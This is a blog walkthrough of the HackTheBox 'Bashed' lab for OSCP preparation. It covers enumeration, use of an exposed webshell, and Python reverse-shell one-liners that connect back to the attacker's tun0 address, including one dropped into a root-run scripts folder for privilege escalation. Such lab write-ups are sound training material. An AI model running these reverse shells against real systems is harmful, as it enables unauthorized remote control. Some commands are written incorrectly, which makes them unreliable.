DEV Community

Cover image for Writeup: HackTheBox Bashed- Without Metasploit (OSCP Prep)
Chris
Chris

Posted on

Writeup: HackTheBox Bashed- Without Metasploit (OSCP Prep)

Bashed HackTheBox Write Up

Super extended delay here.

So somethings I've been working on. I did the TCM Security PEH program. Why you ask if I already have the eJPT and compTIA Security +. Well because I like to learn and I found it pretty cool to go over Windows Directory attacks. I still haven't signed up for the OSCP and I am slowly working through the TJNULL list of OSCP-like boxes.

Difficulty level: Easy
Time to complete: Lets talk

I plan on removing the time to complete because I don't think it matters when doing these challenges and even less if you are new to HTB or Kali. Your main goal should be understanding the services on the box and how to get access plus how to use these tools.

Also I can't recommend the TCM PEH enough even if you just watch the first few videos on setting up Kali because he really walks you through what you should have your system.

So to the box.

I will start with a Nmap Scan to see what services are running on the machine.

-A = Identifying the target OS, Services and the versions on the machine. This will also do a traceroute.

To put it simply, "-A" = -sC, -sV -O -traceroute.

I think I need to write a script that does all of this kind of like AutoRecon.

Alt Text

So port 80 is running on the machine. This is pretty good because that means there is a website running here that I can potentially navigate to. So put the http://10.10.10.68/*80 into your browser.

Command:

http://10.10.10.68/80

Alt Text

A quick right-click search to look at the backend of the site. I don't see much there but I run dirb on another window to discover any directories.

Command:

dirb 10.10.10.68

Alt Text

After a few mins of running this nothing really comes up.

So I am going to try dirbuster instead. Dirbuster is an OWASP tool that has a nice GUI.

If you are on the 2021 version of kali and you are root.

Open up a new terminal as *User.

Command:

user@kali:dirbuster

Another thing to note is that in here I specifiy some items:

Target URL:
http://10.10.10.68

File with list of dir/files:
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

File extension:
php (I am just doing *php since its a php site)

Hit Start

Alt Text

After this runs for a few moments. Switch over to the Results/Scan information.

You should see a Directory Structure that list out structure of what is found. For each one, I will open it up to see if there is anything interesting there.

Alt Text

The first one I found is the /php and boom it shows a Index of /php

Here is a blog post that goes into a little details of why you shouldn't allow this accessible to the internet.
Link: https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/

Alt Text

This site doesn't show any cool results so I will keep going down the line of the results shown before.

Alt Text

Still nothing much to play around here.

So the search continues....

Alt Text

Clicking on the phpbash.php shows that I have a webshell.

Alt Text

So I am going to be honest here and outside of the webshell I don't know what www-data@bashed:/# is.

But you know what I did? I went back to Google lol.

https://askubuntu.com/questions/873839/what-is-the-www-data-user

To basically sum it up, the files are not world writable and are restricted to the owner of the files for writing. With root being the owner, a compromised web server would have access to the entire system.

I am going to *ls-la in my current location to see what rights I have and if there is anything interesting. I see *home and *root there so I am going *cd into them to see if I can find the *txt files. And interesting enough I found the user.txt file in there.

Command:

ls-la

Alt Text

Then I *cat the txt file. I can't access the *root file with my current permissions.

Command:

cat user.txt

Alt Text

Lets see if I can get a reverse shell to my linux terminal.

Some more quick googling and I come across a few reverse shells from highon.

Link: https://highon.coffee/blog/reverse-shell-cheat-sheet/

I tried the php one but no cigar though.

Lets give the python one a try. I am trying this also because *python is on the local bashed machine.

On your *Attacking Machine setup Netcat:

Command:

root@kali: nc -lnvp 80

Run the following code on the terminal *ww-data@bashed:/ *

Command:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("tun0-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Alt Text

So success! I was able to get a Reverse Shell on my terminal. Lets see if I can Switch users. So again I don't know how to do this so I am going to head over to Google to look.

I found the following issue request.

Link: https://superuser.com/questions/273602/how-do-i-su-to-user-login-shell-directly

Alt Text

Then scroll down:

Alt Text

So I am going to give this a swing to see if I can switch users.

Run the following from the terminal.

Command:

sudo -l scriptmanager

Alt Text

I was able to switch users and I whoami to confirm.

Command:

whoami

Then I am going to try and cd into the Root location but no cigar as you see below.

Alt Text

Bummer, but I am stuck in this weird TTY so again quick Google again.

Link: https://unix.stackexchange.com/questions/4126/what-is-the-exact-difference-between-a-terminal-a-shell-a-tty-and-a-con

Ahh this is pretty interesting.

From here I re-Google how to escape a TTY which I found this.
https://netsec.ws/?p=337

Run the following from your terminal.

Command:

python -c 'import pty; pty.spawn("/bin/sh")'

This didn't work so I tried switching the /bin/bash since that is what's on the main machine.

Command:

python -c 'import pty; pty.spawn("/bin/bash")'

Boom this allows me in.

Alt Text

I tried the root file again but no juice.

But there looks like a Scripts folder I can access so I will see what's in there.

Command:

cd scripts
ls-la

So a few things to be happening here:

  1. There is a test.py file that I own.
  2. There is a test.txt that appears to run every few minuets that's running the .py files.

Alt Text

Let's see if I can put a .py file in there.

Command:

echo > kali.py

Alt Text

Nice it works!

So pentest monkey has another php reverse shell I can use that I will attempt to get full root access on the machine with.

You can find it here.
Link: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

The main thing here is to edit these 2 lines for your tun0 and port

Alt Text

So this is kind of up to you, Use wget or copy/paste. I use wget to make it simpler.

Alt Text

After you get this on your machine do the following.

Command:

chmod 777 php-reverse-shell.php

Alt Text

Now use nano or your favorite editing tool to open the file.

Command:

nano php-reverse-shell.php

Alt Text

To exit hit CTRL-X and select Yes to Save

Okay so now that you have this file you need to put this on your victim machine so that it can talk back to your Kali machine.

Use simple local http server to load it there.

Command:

python3 -m http.server 80

Alt Text

So on your Victim machine you are going to use wget again to grab this file.

Command:

wget /php-reverse-shell.php

Alt Text

Then do the following for good measure.

Command:

Chmod 777 php-reverse-shell.php

Alt Text

Now run the following in a new terminal.

Command:

nc -lnvp 1234

Alt Text

So maybe I was doing this wrong but there was an uploads folder that it should allow us to direct to but I could be wrong. I am going to try this again later to see where I may have went wrong.

Alt Text

So I tried this a few times but it didn't work so I attempted something else out. I went back to Google to look for the python reverse shell.

I had to edit the original script a little.

Change: tun0 ip
Use: echo command since you are trying to display line of text/string that are passed as an argument.

Then create a .py file to be run by the machine.

First start a netcat again on your machine with your port.

Command:
nc -lvnp 1234

Then on your other terminal drop the python script in the terminal

Command:

echo import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("tun0",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); > bashed.py

Alt Text

On your Netcat terminal give it 1-2mins to run then you should see a connection.

Alt Text

Way to go!

Some things I want to touch on. I used Google a lot for this. Like a lot! Also I hit some rabbit holes but I tried other things to get access to this machine. I am also trying to be as detailed as possible to show you exactly what I am doing to speed up your learning process. If you run into issues, knowing how to Google for the answers is your best option but also having a community to bounce ideas off of.

Get on a hacking discord server, follow certain OSCP subreddits, go on IRC, etc. What I am saying is that no one does this alone. Its good to have a community to be in to ask questions and read other peoples comments.

Alt Text

Top comments (0)